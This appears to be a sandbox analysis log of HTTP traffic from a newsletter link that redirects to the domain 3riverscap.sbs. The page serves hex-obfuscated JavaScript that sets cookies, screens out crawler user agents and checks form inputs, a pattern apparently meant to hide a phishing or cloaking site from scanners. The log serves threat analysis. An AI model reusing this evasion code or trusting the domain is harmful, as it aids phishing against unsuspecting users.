                                                                              Sec-Fetch-Dest: document
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: __cf_bm=nn06uqL9aDK8kM6eCNzsKa.ZVNrBgAv5KX5V4Svt4R8-1732650866-1.0.1.1-nWDNpfPukp8t8U0XFkkIAj0j7p5WW9fgVwzq3cHy9wmKlscKJQMB_DomaOKAfARkRgyPZoMqw9mfA8YJihA2dg
                                                                              2024-11-26 19:54:27 UTC435INHTTP/1.1 302 Found
                                                                              Date: Tue, 26 Nov 2024 19:54:27 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425
                                                                              X-Robots-Tag: noindex, nofollow
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e303e6b42e2-EWR
                                                                              2024-11-26 19:54:27 UTC209INData Raw: 63 62 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 72 69 76 65 72 73 63 61 70 2e 73 62 73 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 73 76 65 69 6e 62 6a 72 6e 73 2d 6e 65 77 73 6c 65 74 74 65 72 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 72 6f 6c 65 2d 69 6e 2d 70 65 72 73 6f 6e 69 6f 26 61 6d 70 3b 5f 62 68 6c 69 64 3d 31 39 34 36 34 37 61 65 31 34 31 61 36 64 62 34 30 31 36 34 30 31 61 33 64 34 32 61 63 36 34 62 63 31 61 66 65 34 32 35 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                              Data Ascii: cb<a href="https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&amp;utm_medium=newsletter&amp;utm_campaign=role-in-personio&amp;_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425">Found</a>.
                                                                              2024-11-26 19:54:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1649711162.159.140.1604436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:29 UTC1074OUTGET /?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425 HTTP/1.1
                                                                              Host: 3riverscap.sbs
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-full-version: "117.0.5938.132"
                                                                              sec-ch-ua-arch: "x86"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              sec-ch-ua-platform-version: "10.0.0"
                                                                              sec-ch-ua-model: ""
                                                                              sec-ch-ua-bitness: "64"
                                                                              sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:30 UTC1345INHTTP/1.1 503 Service Temporarily Unavailable
                                                                              Date: Tue, 26 Nov 2024 19:54:30 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Set-Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; path=/; expires=Wed, 27-Nov-24 19:54:29 GMT; Max-Age=86400;
                                                                              Set-Cookie: OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; path=/; expires=Wed, 27-Nov-24 19:54:29 GMT; Max-Age=86400;
                                                                              Set-Cookie: BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; path=/; expires=Wed, 27-Nov-24 19:54:29 GMT; Max-Age=86400;
                                                                              Set-Cookie: 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; path=/; expires=Wed, 27-Nov-24 19:54:29 GMT; Max-Age=86400;
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Expires: 0
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3lhmd%2F40r6kamzJDBBPOlGe9MkjbmYpNXHlgjtGyM395U2bldkADhRdbF5JNgSKY3VR0kY2UjP7AQpddk6%2F3FhbvcUl33WQVNKEn7r7NgnlA2qmwj6IiPBgPnPzm2IYJcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e40999243b2-EWR
                                                                              2024-11-26 19:54:30 UTC221INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 39 35 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 34 26 72 65 63 76 5f 62 79 74 65 73 3d 31 36 37 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 38 34 39 32 37 31 26 63 77 6e 64 3d 32 33 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 37 31 35 38 65 36 39 33 32 64 64 36 65 39 31 26 74 73 3d 36 38 30 26 78 3d 30 22 0d 0a 0d 0a
                                                                              Data Ascii: alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1595&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1674&delivery_rate=1849271&cwnd=236&unsent_bytes=0&cid=57158e6932dd6e91&ts=680&x=0"
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 33 33 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                                                                              Data Ascii: 33e3<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 36 33 5c 78 36 38 5c 78 34 35 5c 78 37 36 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 32 38 5c 78 32 32 5c 78 36 46 5c 78 36 45 5c 78 37 32 5c 78 36 35 5c 78 36 31 5c 78 36 34 5c 78 37 39 5c 78 37 33 5c 78 37 34 5c 78 36 31 5c 78 37 34 5c 78 36 35 5c 78 36 33 5c 78 36 38 5c 78 36 31 5c 78 36 45 5c 78 36 37 5c 78 36 35 5c 78 32 32 5c 78 32 43 5c 78 32 30 5c 78 36 32 5c 78 32 39 5c 78 37 44 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 36 32 5c 78 32 38 5c 78 36 36 5c 78 37 35 5c 78 36 45 5c 78 36 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 38 5c 78 32 39 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                              Data Ascii: 63\x68\x45\x76\x65\x6E\x74\x28\x22\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65\x22\x2C\x20\x62\x29\x7D\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 37 5c 78 33 42 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 37 30 5c 78 36 39 5c 78 37 32 5c 78 36 35 5c 78 37 33 5c 78 33 44 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 35 37 5c 78 36 35 5c 78 36 34 5c 78 32 43 5c 78 32 30 5c 78 33 32 5c 78 33 37 5c 78 32 44 5c 78 34 45 5c 78 36 46 5c 78 37 36 5c 78 32 44 5c 78 33 32 5c 78 33 34 5c 78 32 30 5c 78 33 31 5c 78 33 39 5c 78 33 41 5c 78 33 35 5c 78 33 34 5c 78 33 41 5c 78 33 33 5c 78 33 30 5c 78 32 30 5c 78 34 37 5c 78 34 44 5c 78 35 34 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 33 42 5c 78 32 30 5c 78 37 30 5c 78 36 31 5c 78 37 34 5c 78 36 38 5c 78 33 44 5c 78 32 46 5c 78 32 37 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                              Data Ascii: 7\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D\x27\x20\x2B\x20\x27\x57\x65\x64\x2C\x20\x32\x37\x2D\x4E\x6F\x76\x2D\x32\x34\x20\x31\x39\x3A\x35\x34\x3A\x33\x30\x20\x47\x4D\x54\x27\x20\x2B\x20\x27\x3B\x20\x70\x61\x74\x68\x3D\x2F\x27\x3B\x0A\x20\x20\x20\x20\x20\x
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 35 5c 78 36 44 5c 78 36 39 5c 78 37 34 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 36 33 5c 78 36 46 5c 78 37 35 5c 78 36 33 5c 78 36 38 5c 78 36 41 5c 78 37 33 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 37 33 5c 78 37 30 5c 78 36 31 5c 78 37 37 5c 78 36 45 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 37 32 5c 78 36 38 5c 78 36 39 5c 78 36 45 5c 78 36 46 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36
                                                                              Data Ascii: \x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x65\x6D\x69\x74\x29\x7B\x2F\x2A\x63\x6F\x75\x63\x68\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x73\x70\x61\x77\x6E\x29\x7B\x2F\x2A\x72\x68\x69\x6E\x6F\x2A\x2F\x0A\x69\x66\x28\x21\x77\x6
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 78 37 43 5c 78 36 31 5c 78 36 43 5c 78 36 35 5c 78 37 38 5c 78 36 31 5c 78 37 43 5c 78 36 39 5c 78 36 31 5c 78 35 46 5c 78 36 31 5c 78 37 32 5c 78 36 33 5c 78 36 38 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 36 5c 78 36 31 5c 78 36 33 5c 78 36 35 5c 78 36 32 5c 78 36 46 5c 78 36 46 5c 78 36 42 5c 78 37 43 5c 78 37 34 5c 78 37 37 5c 78 36 39 5c 78 37 34 5c 78 37 34 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 43 5c 78 36 39 5c 78 36 45 5c 78 36 42 5c 78 36 35 5c 78 36 34 5c 78 36 39 5c 78 36 45 5c 78 37 43 5c 78 37 30 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 36 34 5c 78 36 46 5c 78 36 44 5c 78 32 46 5c 78 36 39 5c 78 32 45 5c 78 37 34 5c 78 36 35 5c 78 37 33 5c 78 37 34 5c 78 32 38 5c 78 36 45 5c 78 36 31 5c 78 37 36 5c 78 36 39
                                                                              Data Ascii: x7C\x61\x6C\x65\x78\x61\x7C\x69\x61\x5F\x61\x72\x63\x68\x69\x76\x65\x72\x7C\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x74\x77\x69\x74\x74\x65\x72\x7C\x6C\x69\x6E\x6B\x65\x64\x69\x6E\x7C\x70\x69\x6E\x67\x64\x6F\x6D\x2F\x69\x2E\x74\x65\x73\x74\x28\x6E\x61\x76\x69
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 46 5c 78 32 46 5c
                                                                              Data Ascii: 20\x20\x2F\x2A\x7D\x2A\x2F\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2F\x2F\
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 35 5c 78 36 33 5c 78 36 42 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 37 34 5c 78 36 38 5c 78 36 35 5c 78 32 30 5c 78 36 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 36 39 5c 78 37 33 5c 78 37 34 5c 78 37 33 5c 78 32 30 5c 78 36 31 5c 78 36 45 5c 78 36 34 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 36 39 5c 78 37 34 5c 78 32 30 5c 78 36 38 5c 78 36 31 5c 78 37 33 5c 78 32 30 5c 78 36 39 5c 78 36 45 5c 78 37 30 5c 78 37 35 5c 78 37 34 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 36 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 37 33 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 32 38 5c 78 36 36 5c 78 36 39 5c 78 37 32 5c 78 37 33 5c 78 37 34 5c 78 34 36 5c 78 36 46 5c 78 37 32 5c 78
                                                                              Data Ascii: 5\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x66\x6F\x72\x6D\x20\x65\x78\x69\x73\x74\x73\x20\x61\x6E\x64\x20\x69\x66\x20\x69\x74\x20\x68\x61\x73\x20\x69\x6E\x70\x75\x74\x20\x65\x6C\x65\x6D\x65\x6E\x74\x73\x0A\x69\x66\x20\x28\x66\x69\x72\x73\x74\x46\x6F\x72\x
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 32 30 5c 78 33 44 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                              Data Ascii: \x20\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x20\x3D\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
                                                                              2024-11-26 19:54:30 UTC1369INData Raw: 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 44 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 37 33 5c 78 36 35 5c 78 32 30 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30
                                                                              Data Ascii: x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7D\x20\x65\x6C\x73\x65\x20\x7B\x0A\x20\x20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.16497122.18.84.141443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:30 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Encoding: identity
                                                                              User-Agent: Microsoft BITS/7.8
                                                                              Host: fs.microsoft.com
                                                                              2024-11-26 19:54:30 UTC479INHTTP/1.1 200 OK
                                                                              Content-Type: application/octet-stream
                                                                              Server: Kestrel
                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                              X-Ms-Region: prod-neu-z1
                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                              X-OSID: 2
                                                                              X-CID: 2
                                                                              X-CCC: GB
                                                                              Cache-Control: public, max-age=195931
                                                                              Date: Tue, 26 Nov 2024 19:54:30 GMT
                                                                              Connection: close
                                                                              X-CID: 2


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.164971435.190.80.14436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:31 UTC535OUTOPTIONS /report/v4?s=3lhmd%2F40r6kamzJDBBPOlGe9MkjbmYpNXHlgjtGyM395U2bldkADhRdbF5JNgSKY3VR0kY2UjP7AQpddk6%2F3FhbvcUl33WQVNKEn7r7NgnlA2qmwj6IiPBgPnPzm2IYJcg%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://3riverscap.sbs
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:32 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: POST, OPTIONS
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-type, content-length
                                                                              date: Tue, 26 Nov 2024 19:54:31 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1649716162.159.140.1604436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:31 UTC1384OUTPOST /?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425 HTTP/1.1
                                                                              Host: 3riverscap.sbs
                                                                              Connection: keep-alive
                                                                              Content-Length: 22
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              WiXgqsrsMuagvzdbia3g3TcZKU: 45353149
                                                                              X-Requested-TimeStamp-Expire:
                                                                              sec-ch-ua-mobile: ?0
                                                                              X-Requested-TimeStamp-Combination:
                                                                              X-Requested-Type-Combination: GET
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              X-Requested-Type: GET
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              X-Requested-with: XMLHttpRequest
                                                                              X-Requested-TimeStamp:
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://3riverscap.sbs
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: K2piE_1Z_0GqbWMFYcBe7NWfNyA=PI96AqceWhaevb7NnXH9bftxQzo; OH4i20V2D7DIHv9uHxD8JAf5m4w=1732650869; BwSD5Ch2to9Zw_ii8YtiZZcffDo=1732737269; 8cGtcr08qWwCioUZ0rhpFs53On8=1qQOdzaeKHdVSihCRqPURksgHWw; S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8
                                                                              2024-11-26 19:54:31 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                                                              Data Ascii: name1=Henry&name2=Ford
                                                                              2024-11-26 19:54:32 UTC1288INHTTP/1.1 204 No Content
                                                                              Date: Tue, 26 Nov 2024 19:54:32 GMT
                                                                              Connection: close
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Set-Cookie: S_DSd_hq2wEMp-anPerBxlSHfg4=3NtWJ7SspUnAYqBuoc9EzsYqC_8; path=/; expires=Wed, 27-Nov-24 19:54:32 GMT; Max-Age=86400;
                                                                              Set-Cookie: ytb85vtlLNEaqVL6bVF11vMjOx0=1732650872; path=/; expires=Wed, 27-Nov-24 19:54:32 GMT; Max-Age=86400;
                                                                              Set-Cookie: cOiOxvrWexZRQxekKrp9NKmvZuY=1732737272; path=/; expires=Wed, 27-Nov-24 19:54:32 GMT; Max-Age=86400;
                                                                              Set-Cookie: fDN0wTGJWkBMHpJQE2V96znAEWI=1C-4GTPbBUrQHKBauwyqV8q1W54; path=/; expires=Wed, 27-Nov-24 19:54:32 GMT; Max-Age=86400;
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Expires: 0
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SslAoZLQyRbm6h%2B6mx8IHrzBeglwub5R2cpwPFneVSZN5tUwvb%2F2Z5EPk%2FJn3SpImmNxZVYTzeX1UdzIqWwGddflTpk5mmERs3GDRKLAWZ6rfZO6f7GnoYSHDXBxYyYTDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e4dcbb10c94-EWR
                                                                              alt-svc: h3=":443"; ma=86400
